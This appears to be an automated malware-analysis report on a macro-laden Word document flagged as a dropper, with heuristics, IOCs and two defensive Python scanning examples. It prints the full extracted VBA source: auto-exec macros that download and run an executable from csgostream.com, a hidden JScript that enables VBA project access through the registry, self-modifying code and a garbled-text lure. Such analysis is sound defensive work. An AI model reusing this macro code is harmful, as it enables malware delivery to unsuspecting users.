Verdict: MALICIOUS (risk score 694)
Malware Insights
MITRE ATT&CK
- T1566.001 Phishing: Spearphishing Attachment
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1105 Ingress Tool Transfer
- T1027 Obfuscated Files or Information
Two further techniques are supported directly by the macro source reproduced below, although the analyzer's mapping does not list them: T1059.007 Command and Scripting Interpreter: JavaScript (AutoClose writes a JScript file and runs it with cscript.exe //e:jscript) and T1112 Modify Registry (that script sets HKCU\Software\Microsoft\Office\<version>\Word\Security\AccessVBOM to 1).
The sample carries VBA macros in a NewMacros module with AutoOpen and AutoClose entry points. Both call Load, which uses Microsoft.XMLHTTP to fetch http://csgostream.com/ys.exe, writes the response body to %TEMP%\~WTMP000.EXE through ADODB.Stream.SaveToFile and launches it hidden with "cmd /c start": a classic second-stage download. AutoClose additionally writes a self-deleting JScript file (%TEMP%\~W0<random>.TMP) and runs it hidden with "cscript.exe //e:jscript". That script polls GetObject('', 'Word.Application') until no Word instance still has the document open, sets HKCU\Software\Microsoft\Office\<version>\Word\Security\AccessVBOM to 1 so the VBA project becomes scriptable, reopens the document in an invisible Word instance with auto-macros disabled, and runs AutoTurn. AutoTurn rewrites line 10 of its own NewMacros module through the VBE object model (CodeModule.ReplaceLine), which is what trips the macro-virus self-replication heuristic; the visible code only patches its own delete offset and does not copy itself into Normal.dotm or other documents. AutoTurn then duplicates the document body, replaces every letter and digit (Latin and Cyrillic ranges) in the first copy with "?" and marks the second copy as hidden text, so that a reader with macros disabled sees only garbage. On the next open, AutoOpen deletes that garbled prefix (Range(0, 15415)), unhides the original text and saves, so enabling macros appears to "repair" the document while Load runs in the background; re-garbling on close keeps the lure intact if the file is forwarded. The module also defines empty FileTemplates, ToolsCustomizeKeyboard, ToolsMacro, ToolsRecordMacroToggle, ViewCode, ViewSecurity and ViewVBcode procedures; macros named after built-in Word commands intercept those commands, which blocks the obvious UI routes for inspecting the macros or the security settings. The macros reference cmd.exe and the cscript.exe LOLBin.
Heuristics (17)
- ClamAV [critical, CLAMAV_DETECTION]: ClamAV detected this file as malware: Doc.Dropper.Agent-6412232-1
- VBA project inside OOXML [medium, OOXML_VBA, 13 related findings]: document contains a VBA project (VBA macros present)
- Potential Shell call in VBA [critical, OLE_VBA_SHELL]. Matched line in script:
  Shell "cscript.exe //e:jscript """ & TMP & """", vbHide
- WScript.Shell usage [critical, OLE_VBA_WSCRIPT]. Matched line in script:
  X1 = "S=new ActiveXObject('WScript.Shell');" & _
- LOLBin reference in VBA [critical, OLE_VBA_LOLBIN]. Matched line in script:
  Shell "cscript.exe //e:jscript """ & TMP & """", vbHide
- Obfuscated VBA Shell command with URL [critical, OLE_VBA_OBFUSCATED_SHELL_URL]: VBA macro invokes Shell with command text assembled through decoder or string-manipulation functions and includes a URL. This is a high-confidence downloader/dropper pattern, stronger than Shell or URL evidence on their own. Matched line in script:
  X1 = "S=new ActiveXObject('WScript.Shell');" & _
- VBA downloads and writes a file to disk [critical, OLE_VBA_HTTP_DROP_EXEC]: VBA reads an HTTP response body and writes it to disk (ADODB.Stream SaveToFile). Combined with the auto-exec/Shell paths this is a download-drop dropper even when the COM ProgIDs are built dynamically to evade keyword scanning. Matched line in script:
  ADODBST.Write XMLHTTP.responseBody
- VBA macro-virus self-replication / AV tampering [critical, OLE_VBA_MACRO_VIRUS_REPLICATION]: VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family: self-replicating code with no benign document use, independent of any AV signature. Matched line in script:
  ActiveDocument.VBProject.VBComponents("NewMacros").CodeModule.ReplaceLine 10, " ActiveDocument.Range(0, " & Q & ").Delete"
- CreateObject call [high, OLE_VBA_CREATEOBJ]. Matched line in script:
  Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
- GetObject call [high, OLE_VBA_GETOBJ]. Matched line in script:
  "W=GetObject('',A);" & _
- cmd.exe reference in VBA [high, OLE_VBA_CMD]. Matched line in script:
  If Dir$(TMP) <> "" Then Shell "cmd /c start """" """ & TMP & """", vbHide
- VBA p-code auto-exec with execution tokens [high, OLE_VBA_PCODE_AUTOEXEC_EXEC]: compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro [low, OLE_VBA_AUTOOPEN]. Matched line in script:
  Sub AutoOpen()
- Auto_Close macro [low, OLE_VBA_AUTOCLOSE]. Matched line in script:
  Sub AutoClose()
- Environ() call (env variable access) [low, OLE_VBA_ENVIRON]. Matched line in script:
  TMP = Environ("TEMP") & "\~W0" & Int(Rnd * &HFFFF) & ".TMP"
- External hyperlinks (4) [low, OOXML_EXTERNAL_HYPERLINKS]: document contains 4 external hyperlinks; clickable URLs are stored as external relationships. First target: http://afterhoursgaming.tv/csgo-season-5/rules/
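The compound findings above (OLE_VBA_HTTP_DROP_EXEC, OLE_VBA_OBFUSCATED_SHELL_URL, OLE_VBA_MACRO_VIRUS_REPLICATION) are stronger than any single keyword hit because they require several weak indicators to co-occur. The scanner below is an added example of that idea written for this page; it is not the analyzer's rule engine and not part of oletools. The atom regexes, rule names, weights and verdict thresholds are this example's own assumptions, and the sample input is constructed from lines of the macro source reproduced further down.

```python
"""Combination-heuristic scanner for extracted VBA source (added example)."""
import re
from dataclasses import dataclass, field

# Atomic indicators: name -> regex matched case-insensitively over the whole source.
ATOMS = {
    "autoexec":    r"\bSub\s+(AutoOpen|AutoClose|Auto_Open|Auto_Close|Document_Open|Document_Close)\b",
    "shell":       r'\bShell\s*\(?\s*"',
    "wscript":     r"WScript\.Shell",
    "lolbin":      r"\b(cscript|wscript|mshta|rundll32|regsvr32|certutil)\.exe\b",
    "cmd":         r"\bcmd(\.exe)?\s*/c\b",
    "http_get":    r'\.Open\s+"GET"',
    "xmlhttp":     r'CreateObject\("(Microsoft|MSXML2)\.XMLHTTP',
    "resp_body":   r"\.responseBody\b",
    "savetofile":  r"\.SaveToFile\b",
    "url":         r"https?://[^\s\"']+",
    "vbom":        r"AccessVBOM",
    "vbe_rewrite": r"\.CodeModule\.(ReplaceLine|InsertLines|DeleteLines|AddFromString)\b",
    "hidden_font": r"\.Font\.Hidden\s*=\s*1\b",
    "temp_path":   r'Environ\("TEMP"\)',
}

# Compound rules: every atom in the set must be present. Weights are assumptions.
RULES = [
    ("HTTP_DROP_EXEC",   {"http_get", "resp_body", "savetofile", "autoexec"}, 40,
     "fetches an HTTP body, writes it to disk and runs from an auto-exec macro"),
    ("SHELL_LOLBIN",     {"shell", "lolbin"}, 25, "Shell() launches a LOLBin"),
    ("VBE_SELF_MODIFY",  {"vbe_rewrite"}, 30, "rewrites its own VBA project via the VBE object model"),
    ("VBOM_TAMPER",      {"vbom"}, 20, "enables programmatic VBA project access (AccessVBOM)"),
    ("HIDDEN_TEXT_LURE", {"hidden_font", "autoexec"}, 15,
     "toggles hidden text from an auto-exec macro (corrupted-document lure)"),
]


@dataclass
class Report:
    atoms: set = field(default_factory=set)
    findings: list = field(default_factory=list)   # (rule, weight, description)
    urls: list = field(default_factory=list)
    score: int = 0
    verdict: str = "clean"


def scan(source: str) -> Report:
    """Match atoms, fire compound rules, total the weights and map to a verdict."""
    rep = Report()
    for name, pattern in ATOMS.items():
        if re.search(pattern, source, re.IGNORECASE):
            rep.atoms.add(name)
    for m in re.finditer(ATOMS["url"], source, re.IGNORECASE):
        if m.group(0) not in rep.urls:          # keep first-seen order, no duplicates
            rep.urls.append(m.group(0))
    for rule, needed, weight, desc in RULES:
        if needed <= rep.atoms:                 # all required atoms present
            rep.findings.append((rule, weight, desc))
            rep.score += weight
    rep.verdict = "malicious" if rep.score >= 60 else "suspicious" if rep.score >= 25 else "clean"
    return rep


# Constructed input: lines copied from the macro source shown on this page.
SAMPLE = r'''Sub AutoOpen()
Selection.Font.Hidden = 0
ActiveDocument.Range(0, 15415).Delete
Load
End Sub
Sub AutoClose()
X1 = "S=new ActiveXObject('WScript.Shell');" & _
"S.RegWrite('HKCU\\Software\\Microsoft\\Office\\" & Application.Version & "\\Word\\Security\\AccessVBOM',1,'REG_DWORD');"
End Sub
Sub AutoTurn()
ActiveDocument.VBProject.VBComponents("NewMacros").CodeModule.ReplaceLine 10, " ActiveDocument.Range(0, " & Q & ").Delete"
ActiveDocument.Range(Q, O).Font.Hidden = 1
End Sub
Sub StartScript(SCRIPT As String)
TMP = Environ("TEMP") & "\~W0" & Int(Rnd * &HFFFF) & ".TMP"
Shell "cscript.exe //e:jscript """ & TMP & """", vbHide
End Sub
Sub Load()
Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
XMLHTTP.Open "GET", Replace("http://csgostream.com/ys.exe", "\", "/"), "False"
ADODBST.Write XMLHTTP.responseBody
ADODBST.SaveToFile TMP, 2
If Dir$(TMP) <> "" Then Shell "cmd /c start """" """ & TMP & """", vbHide
End Sub
'''

# Constructed benign control: an auto-exec macro alone is not enough to fire any rule.
BENIGN = r'''Sub AutoOpen()
MsgBox "Welcome to the quarterly report"
End Sub
'''

if __name__ == "__main__":
    for label, src in (("sample", SAMPLE), ("benign", BENIGN)):
        rep = scan(src)
        print(f"{label}: {rep.verdict} (score {rep.score}), urls={rep.urls}")
        for rule, weight, desc in rep.findings:
            print(f"  {rule:18} +{weight:<3} {desc}")
```

Single atoms such as `autoexec` or `url` never score on their own, which keeps ordinary documents with an AutoOpen or a hyperlink in a string out of the suspicious band; the score only climbs when download, write, execute and auto-exec are all present, as they are in this macro.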
- Embedded URL [info, EMBEDDED_URL]: one or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
  - http://afterhoursgaming.tv/csgo-season-5/rules/ (referenced by macro)
  - http://day9.tv/d/b/ahgl-blog/ (referenced by macro)
  - http://csgostream.com/ys.exe (referenced by macro)
  - http://@csgost� (referenced by macro; partial carve, ends in a replacement character)
  - http://csgostream.com/ys.exe� (referenced by macro; garbled duplicate of the ys.exe URL above)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas (referenced by macro)
  - http://schemas.openxmlformats.org/markup-compatibility/2006 (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/relationships (referenced by macro)
  - http://schemas.openxmlformats.org/officeDocument/2006/math (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing (referenced by macro)
  - http://schemas.openxmlformats.org/wordprocessingml/2006/main (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2012/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingGroup (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingInk (referenced by macro)
  - http://schemas.microsoft.com/office/word/2006/wordml (referenced by macro)
  - http://schemas.microsoft.com/office/word/2010/wordprocessingShape (referenced by macro)
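Most of the URLs in that list are OOXML namespace identifiers, and two are garbled string carves; only three are candidates for blocking or hunting. The triage routine below is an added example for this page, not part of the analyzer: it separates namespace hosts from real IOCs, flags carves that contain a replacement character or a malformed authority, ties a garbled carve back to the clean URL it duplicates, and marks paths with executable extensions. The namespace host set, the extension list and the input tuples (copied from the list above) are this example's own assumptions.

```python
"""Triage of URLs carved from a maldoc: IOC vs. XML namespace vs. garbled carve (added example)."""
from urllib.parse import urlsplit

# Hosts that serve XML namespace identifiers rather than content (assumption).
NAMESPACE_HOSTS = {"schemas.openxmlformats.org", "schemas.microsoft.com", "www.w3.org", "purl.org"}
# Extensions that mark a download target as a likely payload (assumption).
PAYLOAD_EXT = (".exe", ".dll", ".scr", ".js", ".vbs", ".hta", ".ps1", ".bat", ".cmd", ".msi")


def normalize(url: str) -> str:
    """Canonical form used for de-duplication: lower-case scheme and host, path, query."""
    p = urlsplit(url)
    host = (p.hostname or "").lower()
    path = p.path or "/"
    return f"{p.scheme.lower()}://{host}{path}" + (f"?{p.query}" if p.query else "")


def triage(extracted):
    """extracted: list of (url, channel). Returns {'ioc': [...], 'namespace': [...], 'garbled': [...]}."""
    out = {"ioc": [], "namespace": [], "garbled": []}
    seen = {}                                   # normalized form -> first accepted URL
    for url, channel in extracted:
        clean = url.replace("\ufffd", "")       # strip U+FFFD left by a truncated carve
        p = urlsplit(clean)
        garbled = ("\ufffd" in url or not p.hostname or "@" in p.netloc
                   or any(ord(c) < 32 for c in url))
        if garbled:
            out["garbled"].append({
                "url": url, "channel": channel, "cleaned": clean,
                # If the cleaned form equals an accepted IOC, it is a duplicate carve of it.
                "duplicate_of": seen.get(normalize(clean)) if p.hostname else None,
            })
            continue
        if p.hostname.lower() in NAMESPACE_HOSTS:
            out["namespace"].append({"url": url, "channel": channel})
            continue
        key = normalize(url)
        if key in seen:                         # exact duplicate of an accepted IOC
            continue
        seen[key] = url
        out["ioc"].append({
            "url": url, "host": p.hostname.lower(), "channel": channel,
            "payload": p.path.lower().endswith(PAYLOAD_EXT),
        })
    return out


# Constructed input: the per-URL labels from this report, with "\ufffd" standing for the
# replacement character shown in the two garbled entries.
EXTRACTED = [
    ("http://afterhoursgaming.tv/csgo-season-5/rules/", "macro"),
    ("http://day9.tv/d/b/ahgl-blog/", "macro"),
    ("http://csgostream.com/ys.exe", "macro"),
    ("http://@csgost\ufffd", "macro"),
    ("http://csgostream.com/ys.exe\ufffd", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordprocessingCanvas", "macro"),
    ("http://schemas.openxmlformats.org/markup-compatibility/2006", "macro"),
    ("http://schemas.openxmlformats.org/officeDocument/2006/relationships", "macro"),
    ("http://schemas.openxmlformats.org/officeDocument/2006/math", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordprocessingDrawing", "macro"),
    ("http://schemas.openxmlformats.org/drawingml/2006/wordprocessingDrawing", "macro"),
    ("http://schemas.openxmlformats.org/wordprocessingml/2006/main", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordml", "macro"),
    ("http://schemas.microsoft.com/office/word/2012/wordml", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordprocessingGroup", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordprocessingInk", "macro"),
    ("http://schemas.microsoft.com/office/word/2006/wordml", "macro"),
    ("http://schemas.microsoft.com/office/word/2010/wordprocessingShape", "macro"),
]

if __name__ == "__main__":
    res = triage(EXTRACTED)
    for e in res["ioc"]:
        print(f"IOC      {e['url']}  host={e['host']}  payload={e['payload']}")
    for e in res["garbled"]:
        print(f"GARBLED  {e['url']!r}  duplicate_of={e['duplicate_of']}")
    print(f"{len(res['namespace'])} namespace URLs ignored")
```

The "referenced by macro" label is kept on every entry but is not used for classification: a namespace URI is noise whichever channel reported it, and the carve-duplicate check is what stops the garbled ys.exe entry from being pushed as a second, bogus indicator.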
Extracted artifacts (2)
Files carved from inside the sample during analysis.

| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 4276 bytes |

SHA-256: 2b50a97ed398e2028498b02ed9c105b182ee838c68448a6e0dadadb8ec0a6432

Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Name = "NewMacros"
Private Declare Sub OpenClipboard Lib "user32" (ByVal H As Long)
Private Declare Sub EmptyClipboard Lib "user32" ()
Private Declare Sub CloseClipboard Lib "user32" ()
Sub AutoOpen()
On Error GoTo Quit
If ActiveDocument.ReadOnly Then Exit Sub
ScreenUpdating = False
Selection.WholeStory
Selection.Font.Hidden = 0
ActiveDocument.Range(0, 15415).Delete
Selection.GoTo 1, 1
ActiveDocument.Save
Quit:
ScreenUpdating = True
Load
End Sub
Sub AutoClose()
On Error GoTo Quit
Load
NN = ""
DN = ActiveDocument.FullName
For I = 1 To Len(DN)
L = Mid(DN, I, 1)
If L = "\" Or L = "'" Then NN = NN + "\"
NN = NN + L
Next
X0 = "A='Word.Application';" & _
"N='" & NN & "';" & _
"for(B=1;B;){" & _
"try{" & _
"B=0;" & _
"W=GetObject('',A);" & _
"for(D=new Enumerator(W.Documents);!D.atEnd();D.moveNext())" & _
"if(N.toLowerCase()==D.item().FullName.toLowerCase())B=1;" & _
"}catch(E){}" & _
"WScript.sleep(1);" & _
"}" & _
"WScript.sleep(1500);"
X1 = "S=new ActiveXObject('WScript.Shell');" & _
"S.RegWrite('HKCU\\Software\\Microsoft\\Office\\" & Application.Version & "\\Word\\Security\\AccessVBOM',1,'REG_DWORD');"
X2 = "W=new ActiveXObject(A);" & _
"W.Visible=0;" & _
"W.WordBasic.DisableAutoMacros(1);" & _
"W.Documents.Open(N);" & _
"W.Application.Run('AutoTurn');"
X3 = "W.ActiveDocument.Save();" & _
"W.ActiveDocument.Close();" & _
"W.Quit();"
StartScript "try{" & X0 & X1 & X2 & X3 & "}catch(E){}"
Quit:
End Sub
Sub AutoTurn()
On Error GoTo Quit
If ActiveDocument.ReadOnly Then Exit Sub
Selection.EndKey 6
Q = Selection.Start
ActiveDocument.VBProject.VBComponents("NewMacros").CodeModule.ReplaceLine 10, " ActiveDocument.Range(0, " & Q & ").Delete"
If Q = 0 Then Exit Sub
Selection.GoTo 1, 1
ActiveDocument.Range(0, Q).Select
Selection.Copy
Selection.GoTo 1, 1
Selection.PasteAndFormat 16
OpenClipboard 0
EmptyClipboard
CloseClipboard
Selection.GoTo 1, 1
ActiveDocument.Range(0, Q).Select
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
Selection.Find.Execute "[0-9|a-z|A-Z|а-я|А-Я]", 0, 0, 1, 0, 0, 0, 0, 0, "?", 2
Selection.Find.ClearFormatting
Selection.Find.Replacement.ClearFormatting
Selection.EndKey 6
O = Selection.Start
ActiveDocument.Range(Q, O).Font.Hidden = 1
Quit:
End Sub
Sub StartScript(SCRIPT As String)
On Error GoTo Quit
TMP = Environ("TEMP") & "\~W0" & Int(Rnd * &HFFFF) & ".TMP"
Open TMP For Output As #1
Print #1, "F=new ActiveXObject('Scripting.FileSystemObject');F.DeleteFile(WScript.ScriptFullName);" & SCRIPT
Close #1
Shell "cscript.exe //e:jscript """ & TMP & """", vbHide
Quit:
End Sub
Sub Load()
On Error GoTo Quit
TMP = Environ("TEMP") & "\~WTMP000.EXE"
If Dir$(TMP) <> "" Then Kill TMP
Set XMLHTTP = CreateObject("Microsoft.XMLHTTP")
XMLHTTP.Open "GET", Replace("http://csgostream.com/ys.exe", "\", "/"), "False"
XMLHTTP.Send
If XMLHTTP.StatusText = "OK" Then
Set ADODBST = CreateObject("ADODB.Stream")
ADODBST.Type = 1
ADODBST.Open
ADODBST.Write XMLHTTP.responseBody
ADODBST.SaveToFile TMP, 2
ADODBST.Close
Set ADODBST = Nothing
End If
Set XMLHTTP = Nothing
If Dir$(TMP) <> "" Then Shell "cmd /c start """" """ & TMP & """", vbHide
Quit:
End Sub
Sub FileTemplates()
End Sub
Sub ToolsCustomizeKeyboard()
End Sub
Sub ToolsMacro()
End Sub
Sub ToolsRecordMacroToggle()
End Sub
Sub ViewCode()
End Sub
Sub ViewSecurity()
End Sub
Sub ViewVBcode()
End Sub
| Filename | Kind | Source | Size |
|---|---|---|---|
| vbaProject_00.bin | vba-project | OOXML VBA project: word/vbaProject.bin | 18944 bytes |

SHA-256: acbb8cdf1673c01157bb9527eb824d853d86e79f3ba74ea6d2896b8876d1c3d9
Detection
ClamAV: Doc.Dropper.Agent-6412232-1
Obfuscation or payload: unlikely